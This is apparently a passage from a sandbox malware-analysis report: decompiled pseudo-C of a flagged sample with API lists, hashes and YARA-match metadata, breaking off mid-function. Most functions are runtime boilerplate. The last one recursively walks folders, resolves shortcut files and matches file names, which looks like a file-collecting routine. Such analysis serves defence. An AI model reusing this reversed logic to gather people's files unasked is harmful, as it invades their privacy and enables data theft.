                                                                                
                                                                                				_t57 = __esi;
                                                                                				_t51 = __ecx;
                                                                                				_push(0xd8);
                                                                                				E004219DE(E004370C7, __ebx, __edi, __esi);
                                                                                				_t56 = __ecx;
                                                                                				 *((intOrPtr*)(_t59 - 0x30)) = 0;
                                                                                				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t59 - 0x34)) = __ecx;
                                                                                				 *((char*)(__ecx)) = 0;
                                                                                				 *((intOrPtr*)(_t59 - 0xe0)) = 0x4425c8;
                                                                                				 *((intOrPtr*)(_t59 - 0xd0)) = 0x442704;
                                                                                				 *((intOrPtr*)(_t59 - 0x80)) = 0x441158;
                                                                                				_push(_t59 - 0xc8);
                                                                                				 *((intOrPtr*)(_t59 - 4)) = 1;
                                                                                				_push(_t59 - 0xe0);
                                                                                				 *((intOrPtr*)(_t59 - 0x30)) = 3;
                                                                                				E004169F3(__esi, 0); // executed
                                                                                				 *((intOrPtr*)(_t59 - 4)) = 2;
                                                                                				_t14 =  *((intOrPtr*)(_t59 - 0xe0)) + 4; // 0x60
                                                                                				 *((intOrPtr*)(_t59 +  *_t14 - 0xe0)) = 0x4411fc;
                                                                                				E00414F20(0, __ecx, __esi, 0, _t59 - 0xc8);
                                                                                				 *((intOrPtr*)(_t59 - 0xc8)) = 0x4411bc;
                                                                                				 *((intOrPtr*)(_t59 - 0x8c)) = 0;
                                                                                				 *((intOrPtr*)(_t59 - 0x88)) = 0;
                                                                                				 *((intOrPtr*)(_t59 - 4)) = 4;
                                                                                				E00417DA6(0, _t51, _t56, _t57, 0, _t59 - 0xd0,  *((intOrPtr*)(_t59 + 8)));
                                                                                				_t42 = E0040C982(_t59 - 0xe0, _t59 - 0x2c);
                                                                                				 *((char*)(_t59 - 4)) = 5;
                                                                                				E0040CFB8(_t56, _t42);
                                                                                				E00402C34(_t59 - 0x2c, 1, 0);
                                                                                				 *((char*)(_t59 - 4)) = 0;
                                                                                				E0040B593(_t59 - 0xe0, 0, _t56);
                                                                                				return E00421A61(0, _t56, _t42);
                                                                                			}






                                                                                0x00417463
                                                                                0x00417463
                                                                                0x00417463
                                                                                0x0041746d
                                                                                0x00417472
                                                                                0x00417476
                                                                                0x00417479
                                                                                0x00417480
                                                                                0x00417483
                                                                                0x00417486
                                                                                0x00417488
                                                                                0x00417492
                                                                                0x0041749c
                                                                                0x004174a9
                                                                                0x004174b0
                                                                                0x004174b7
                                                                                0x004174b8
                                                                                0x004174bf
                                                                                0x004174c4
                                                                                0x004174d1
                                                                                0x004174d4
                                                                                0x004174e6
                                                                                0x004174eb
                                                                                0x004174f5
                                                                                0x004174fb
                                                                                0x0041750b
                                                                                0x00417512
                                                                                0x00417521
                                                                                0x00417528
                                                                                0x0041752c
                                                                                0x00417537
                                                                                0x00417542
                                                                                0x00417545
                                                                                0x00417551

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0041746D
                                                                                  • Part of subcall function 004169F3: __EH_prolog3.LIBCMT ref: 004169FA
                                                                                  • Part of subcall function 00414F20: __EH_prolog3.LIBCMT ref: 00414F27
                                                                                  • Part of subcall function 00414F20: std::_Mutex::_Mutex.LIBCPMT ref: 00414F38
                                                                                  • Part of subcall function 00414F20: std::locale::_Init.LIBCPMT ref: 00414F4F
                                                                                  • Part of subcall function 00414F20: std::locale::facet::_Incref.LIBCPMT ref: 00414F5D
                                                                                  • Part of subcall function 00417DA6: __EH_prolog3_catch.LIBCMT ref: 00417DAD
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 0040B593: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040B5A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_memmove$H_prolog3_H_prolog3_catchIncrefInitIos_base_dtorMutexMutex::_std::_std::ios_base::_std::locale::_std::locale::facet::_
                                                                                • String ID:
                                                                                • API String ID: 3326898877-0
                                                                                • Opcode ID: 1ab3d58aa075648dfd068472587dd9e940e1caeabe0c2d4bf56d633abaa55544
                                                                                • Instruction ID: 3c1c28bed4adb165aa5ba628e1cee47c92275fc053e28587ff6ea9a4e784ed42
                                                                                • Opcode Fuzzy Hash: 1ab3d58aa075648dfd068472587dd9e940e1caeabe0c2d4bf56d633abaa55544
                                                                                • Instruction Fuzzy Hash: 1F21FCB1801259DEDB10DF95D885BCDBBB8BF14308F5085EFE108B7241C7B85A888F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00427EAA(signed int _a4, signed int _a8, long _a12) {
                                                                                				void* _t10;
                                                                                				long _t11;
                                                                                				long _t12;
                                                                                				signed int _t13;
                                                                                				signed int _t17;
                                                                                				long _t19;
                                                                                				long _t24;
                                                                                
                                                                                				_t17 = _a4;
                                                                                				if(_t17 == 0) {
                                                                                					L3:
                                                                                					_t24 = _t17 * _a8;
                                                                                					__eflags = _t24;
                                                                                					if(_t24 == 0) {
                                                                                						_t24 = _t24 + 1;
                                                                                						__eflags = _t24;
                                                                                					}
                                                                                					goto L5;
                                                                                					L6:
                                                                                					_t10 = RtlAllocateHeap( *0x449158, 8, _t24); // executed
                                                                                					__eflags = 0;
                                                                                					if(0 == 0) {
                                                                                						goto L7;
                                                                                					}
                                                                                					L14:
                                                                                					return _t10;
                                                                                					goto L15;
                                                                                					L7:
                                                                                					__eflags =  *0x44978c;
                                                                                					if( *0x44978c == 0) {
                                                                                						_t19 = _a12;
                                                                                						__eflags = _t19;
                                                                                						if(_t19 != 0) {
                                                                                							 *_t19 = 0xc;
                                                                                						}
                                                                                					} else {
                                                                                						_t11 = E0042482A(_t10, _t24);
                                                                                						__eflags = _t11;
                                                                                						if(_t11 != 0) {
                                                                                							L5:
                                                                                							_t10 = 0;
                                                                                							__eflags = _t24 - 0xffffffe0;
                                                                                							if(_t24 > 0xffffffe0) {
                                                                                								goto L7;
                                                                                							} else {
                                                                                								goto L6;
                                                                                							}
                                                                                						} else {
                                                                                							_t12 = _a12;
                                                                                							__eflags = _t12;
                                                                                							if(_t12 != 0) {
                                                                                								 *_t12 = 0xc;
                                                                                							}
                                                                                							_t10 = 0;
                                                                                						}
                                                                                					}
                                                                                					goto L14;
                                                                                				} else {
                                                                                					_t13 = 0xffffffe0;
                                                                                					_t27 = _t13 / _t17 - _a8;
                                                                                					if(_t13 / _t17 >= _a8) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						 *((intOrPtr*)(E00423E5B(_t27))) = 0xc;
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                				L15:
                                                                                			}










                                                                                0x00427eaf
                                                                                0x00427eb4
                                                                                0x00427ed1
                                                                                0x00427ed6
                                                                                0x00427ed8
                                                                                0x00427eda
                                                                                0x00427edc
                                                                                0x00427edc
                                                                                0x00427edc
                                                                                0x00000000
                                                                                0x00427ee4
                                                                                0x00427eed
                                                                                0x00427ef3
                                                                                0x00427ef5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00427f29
                                                                                0x00427f2b
                                                                                0x00000000
                                                                                0x00427ef7
                                                                                0x00427ef7
                                                                                0x00427efe
                                                                                0x00427f1c
                                                                                0x00427f1f
                                                                                0x00427f21
                                                                                0x00427f23
                                                                                0x00427f23
                                                                                0x00427f00
                                                                                0x00427f01
                                                                                0x00427f07
                                                                                0x00427f09
                                                                                0x00427edd
                                                                                0x00427edd
                                                                                0x00427edf
                                                                                0x00427ee2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00427f0b
                                                                                0x00427f0b
                                                                                0x00427f0e
                                                                                0x00427f10
                                                                                0x00427f12
                                                                                0x00427f12
                                                                                0x00427f18
                                                                                0x00427f18
                                                                                0x00427f09
                                                                                0x00000000
                                                                                0x00427eb6
                                                                                0x00427eba
                                                                                0x00427ebd
                                                                                0x00427ec0
                                                                                0x00000000
                                                                                0x00427ec2
                                                                                0x00427ec7
                                                                                0x00427ed0
                                                                                0x00427ed0
                                                                                0x00427ec0
                                                                                0x00000000

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00423055,?,?,00000000,00000000,00000000,?,00427B18,00000001,00000214), ref: 00427EED
                                                                                  • Part of subcall function 00423E5B: __getptd_noexit.LIBCMT ref: 00423E5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 328603210-0
                                                                                • Opcode ID: e7e8d367f46f83816ea8076d3e9d5c27fb6f63afcbdaef76b2a240d3f09669d6
                                                                                • Instruction ID: 89d001067ae943950055174a336def3ab18d9b67e45a2f5168d8cf5bbdb92ca5
                                                                                • Opcode Fuzzy Hash: e7e8d367f46f83816ea8076d3e9d5c27fb6f63afcbdaef76b2a240d3f09669d6
                                                                                • Instruction Fuzzy Hash: 5701D8313092369AEB24DF26FC04B6B3758AF81761F43896BF815D7290DB38CC008758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00C74004
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHeap
                                                                                • String ID:
                                                                                • API String ID: 10892065-0
                                                                                • Opcode ID: 04cd5df9f55645ed520e5bc8e52ff40184ad62a185527cc972710299f336aa81
                                                                                • Instruction ID: 93e710b84dd4ff5f04086c58dff0e23b88f9a6169f332405debc03c0a43257b7
                                                                                • Opcode Fuzzy Hash: 04cd5df9f55645ed520e5bc8e52ff40184ad62a185527cc972710299f336aa81
                                                                                • Instruction Fuzzy Hash: 68D05E32550344AAEB105FB5AC087663BDCE385395F048436F95DC6250E674C541DA10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E004169F3(void* __esi, void* __eflags) {
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                				intOrPtr* _t23;
                                                                                				void* _t24;
                                                                                
                                                                                				_push(4);
                                                                                				E00421975(E00436CB2, _t20, _t21, __esi);
                                                                                				_t23 =  *((intOrPtr*)(_t24 + 8));
                                                                                				 *(_t24 - 0x10) =  *(_t24 - 0x10) & 0x00000000;
                                                                                				E00414C17(_t20, _t21, _t23,  *(_t24 - 0x10), _t23,  *((intOrPtr*)(_t24 + 0xc))); // executed
                                                                                				 *((intOrPtr*)(_t23 +  *((intOrPtr*)( *((intOrPtr*)(_t23 + 0x10)) + 4)) + 0x10)) = 0x4411ac;
                                                                                				 *((intOrPtr*)(_t23 +  *((intOrPtr*)( *_t23 + 4)))) = 0x4411b4;
                                                                                				return E00421A4D(_t23);
                                                                                			}







                                                                                0x004169f3
                                                                                0x004169fa
                                                                                0x004169ff
                                                                                0x00416a05
                                                                                0x00416a0a
                                                                                0x00416a15
                                                                                0x00416a22
                                                                                0x00416a30

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004169FA
                                                                                  • Part of subcall function 00414C17: __EH_prolog3.LIBCMT ref: 00414C1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3
                                                                                • String ID:
                                                                                • API String ID: 431132790-0
                                                                                • Opcode ID: efa3bb3c7bd80237d80622d9fb70ae7e8516c41f69546cc5badce409429bc3f1
                                                                                • Instruction ID: a93c9d1a518b0919b242d818ac543b0d2d28a65533779c7c75178345d5b45e48
                                                                                • Opcode Fuzzy Hash: efa3bb3c7bd80237d80622d9fb70ae7e8516c41f69546cc5badce409429bc3f1
                                                                                • Instruction Fuzzy Hash: 87E01A742006109BD721DF04C801E59B7E4BF19304F41C54AFA805B321C378E940CB9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00415610(intOrPtr _a4) {
                                                                                				signed int _v8;
                                                                                				struct _SYSTEM_INFO _v44;
                                                                                				void* __ebp;
                                                                                				void* _t10;
                                                                                				void* _t12;
                                                                                				void* _t13;
                                                                                				void* _t14;
                                                                                
                                                                                				_t1 =  &_v8;
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				GetSystemInfo( &_v44); // executed
                                                                                				E00417463(_t10, _a4, _t12, _t13, _t14,  *_t1, _v44.dwNumberOfProcessors); // executed
                                                                                				return _a4;
                                                                                			}










                                                                                0x00415616
                                                                                0x00415616
                                                                                0x0041561e
                                                                                0x0041562a
                                                                                0x00415633

                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,4124C941), ref: 0041561E
                                                                                  • Part of subcall function 00417463: __EH_prolog3_GS.LIBCMT ref: 0041746D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 2966166590-0
                                                                                • Opcode ID: 5f92554b0ca8216035f6fddf8669359bac445a9e16af64ecc1838f5950a532e5
                                                                                • Instruction ID: 972e73779750022b688189fcf2bfcb24e180123cf60594e3776ea22aa5d8b921
                                                                                • Opcode Fuzzy Hash: 5f92554b0ca8216035f6fddf8669359bac445a9e16af64ecc1838f5950a532e5
                                                                                • Instruction Fuzzy Hash: 86D0A77180010CEBCB00EFA0D489ECD7BB8AB08309F004010F500A3150C774DA59CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __encode_pointer.LIBCMT ref: 00C76F87
                                                                                  • Part of subcall function 00C76F13: TlsGetValue.KERNEL32(00000000,?,00C76F8C,00000000,00C7DA1D,00DAD900,00000000,00000314,?,00C76034,00DAD900,Microsoft Visual C++ Runtime Library,00012010), ref: 00C76F25
                                                                                  • Part of subcall function 00C76F13: TlsGetValue.KERNEL32(00000005,?,00C76F8C,00000000,00C7DA1D,00DAD900,00000000,00000314,?,00C76034,00DAD900,Microsoft Visual C++ Runtime Library,00012010), ref: 00C76F3C
                                                                                  • Part of subcall function 00C76F13: RtlEncodePointer.NTDLL(00000000,?,00C76F8C,00000000,00C7DA1D,00DAD900,00000000,00000314,?,00C76034,00DAD900,Microsoft Visual C++ Runtime Library,00012010), ref: 00C76F7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: Value$EncodePointer__encode_pointer
                                                                                • String ID:
                                                                                • API String ID: 2585649348-0
                                                                                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                • Instruction ID: 3bf1f59774e12fd619a33481815e3280c224340d83fdebebd7109a526416172c
                                                                                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlEncodePointer.NTDLL(00000000,0042F472,00449160,00000314,00000000,?,?,?,?,?,00424770,00449160,Microsoft Visual C++ Runtime Library,00012010), ref: 004279B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID:
                                                                                • API String ID: 2118026453-0
                                                                                • Opcode ID: 890bcb0604b07ed1d40f905364f67d67e931464ae62e7d89c780419831222b95
                                                                                • Instruction ID: 45cfde8e58aa55ea41bb1d1a622fc9dd9742d3e9ce5069b4fe2740196e0f3838
                                                                                • Opcode Fuzzy Hash: 890bcb0604b07ed1d40f905364f67d67e931464ae62e7d89c780419831222b95
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C672DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID:
                                                                                • API String ID: 3494564517-0
                                                                                • Opcode ID: 04f33de6c8cde3b670c2cf146abdbfef6cad668040cbfadeb1794ec271781cee
                                                                                • Instruction ID: 0ac31e379cbb5504b5113a3d861e699c916368d262e372919146145968a2179c
                                                                                • Opcode Fuzzy Hash: 04f33de6c8cde3b670c2cf146abdbfef6cad668040cbfadeb1794ec271781cee
                                                                                • Instruction Fuzzy Hash: F4E0E56180C248CFC7108A62849ABE67FF0EF4A308F304BC7ED565B262C6204509D752
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C672DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID:
                                                                                • API String ID: 3494564517-0
                                                                                • Opcode ID: 33db89a6cb99ed4e822cd72e41333510c9e552b62c058cbc824f8583fc7b1281
                                                                                • Instruction ID: c490743275e4c69d8f2913ac5fd3e8fcfabaafc096081670fbbf1b1cf7db2c5f
                                                                                • Opcode Fuzzy Hash: 33db89a6cb99ed4e822cd72e41333510c9e552b62c058cbc824f8583fc7b1281
                                                                                • Instruction Fuzzy Hash: 66E0DF6440C288DBC7008A6284C9FE53BE2DF08318B204796DD4A4A662DA304800EB63
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C672DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLocal
                                                                                • String ID:
                                                                                • API String ID: 3494564517-0
                                                                                • Opcode ID: 0ae532b9958a6a93f54eb984a6c1d1a94ec9c6e45b59e9eff8542e293e39080b
                                                                                • Instruction ID: 4ede1786fc789dc39a7d26cbfddb1a43cad94e2e74dadcd7fc015fca5dea8428
                                                                                • Opcode Fuzzy Hash: 0ae532b9958a6a93f54eb984a6c1d1a94ec9c6e45b59e9eff8542e293e39080b
                                                                                • Instruction Fuzzy Hash: 94C02B7248C200FFC32087E28C8BD773865674C78AF304E067503B2291C330080096B3
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E0040950A(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, int _a32, int _a36) {
                                                                                				signed int _v12;
                                                                                				char _v280;
                                                                                				char _v544;
                                                                                				char _v808;
                                                                                				char _v1072;
                                                                                				char _v1336;
                                                                                				char _v6336;
                                                                                				struct _WIN32_FIND_DATAA _v6656;
                                                                                				intOrPtr _v6660;
                                                                                				char* _v6664;
                                                                                				char _v6668;
                                                                                				void* _v6672;
                                                                                				intOrPtr _v6676;
                                                                                				char _v6680;
                                                                                				char _v6684;
                                                                                				intOrPtr _v6688;
                                                                                				intOrPtr _v6692;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t99;
                                                                                				intOrPtr _t103;
                                                                                				int _t112;
                                                                                				void* _t129;
                                                                                				int _t136;
                                                                                				void* _t149;
                                                                                				char* _t150;
                                                                                				int _t154;
                                                                                				int _t161;
                                                                                				intOrPtr _t175;
                                                                                				int _t177;
                                                                                				char* _t180;
                                                                                				void* _t194;
                                                                                				void* _t201;
                                                                                				CHAR* _t202;
                                                                                				intOrPtr _t203;
                                                                                				signed int _t204;
                                                                                				void* _t205;
                                                                                				void* _t207;
                                                                                				void* _t208;
                                                                                				char* _t209;
                                                                                
                                                                                				_t201 = __edx;
                                                                                				E00430D40(0x1a20);
                                                                                				_t99 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t99 ^ _t204;
                                                                                				_t196 = _a16;
                                                                                				_v6660 = _a4;
                                                                                				_t203 = _a28;
                                                                                				_v6676 = _a8;
                                                                                				_t103 = _a12;
                                                                                				_v6692 = _t103;
                                                                                				_v6664 = _a16;
                                                                                				_v6688 = _t203;
                                                                                				wsprintfA( &_v1336, "%s\\*", _t103);
                                                                                				_v6672 = FindFirstFileA( &_v1336,  &_v6656);
                                                                                				E00427E30( &_v6336, 0, 0x1388);
                                                                                				_t207 = _t205 + 0x18;
                                                                                				_t112 =  *0x44a1b8( &_v6336, _t203);
                                                                                				if(_v6672 == 0xffffffff) {
                                                                                					L43:
                                                                                					return E0041DEB4(_t112, 0, _v12 ^ _t204, _t201, _t202, _t203);
                                                                                				}
                                                                                				_t202 = "\\";
                                                                                				do {
                                                                                					_push(".");
                                                                                					_push( &(_v6656.cFileName));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L41;
                                                                                					}
                                                                                					_push("..");
                                                                                					_push( &(_v6656.cFileName));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L41;
                                                                                					}
                                                                                					 *0x44a220( &_v280, _v6692);
                                                                                					 *0x44a1b8( &_v280, _t202);
                                                                                					 *0x44a1b8( &_v280,  &(_v6656.cFileName));
                                                                                					_t213 = _a36;
                                                                                					if(_a36 != 0) {
                                                                                						L6:
                                                                                						E00427E30( &_v808, 0, 0x104);
                                                                                						_t203 = _v6676;
                                                                                						_t208 = _t207 + 0xc;
                                                                                						_t129 =  *0x44a1d8(_t203, 0x43e028);
                                                                                						_push( &(_v6656.cFileName));
                                                                                						if(_t129 != 0) {
                                                                                							_push(_t203);
                                                                                							wsprintfA( &_v1072, "%s\\%s");
                                                                                							_t207 = _t208 + 0x10;
                                                                                						} else {
                                                                                							wsprintfA( &_v1072, "%s");
                                                                                							_t207 = _t208 + 0xc;
                                                                                						}
                                                                                						if(lstrlenA( &_v6336) <= 3) {
                                                                                							__eflags = _a36;
                                                                                							if(_a36 == 0) {
                                                                                								L35:
                                                                                								_t136 = PathMatchSpecA( &(_v6656.cFileName), _v6664);
                                                                                								__eflags = _t136;
                                                                                								if(_t136 == 0) {
                                                                                									goto L39;
                                                                                								}
                                                                                								_push(_t203);
                                                                                								goto L28;
                                                                                							}
                                                                                							_t154 = PathMatchSpecA( &(_v6656.cFileName), "*.lnk");
                                                                                							__eflags = _t154;
                                                                                							if(_t154 == 0) {
                                                                                								goto L35;
                                                                                							}
                                                                                							 *0x44a1d0(0);
                                                                                							E00409126( &_v280,  &_v808);
                                                                                							_pop(_t196);
                                                                                							 *0x44a1c0();
                                                                                							_t161 = PathMatchSpecA( &_v808, _v6664);
                                                                                							__eflags = _t161;
                                                                                							if(_t161 == 0) {
                                                                                								goto L39;
                                                                                							}
                                                                                							_push(_t203);
                                                                                							goto L23;
                                                                                						} else {
                                                                                							_t175 = E0041F145(0, _t201, _t202,  &_v6336, ":",  &_v6684);
                                                                                							_t207 = _t207 + 0xc;
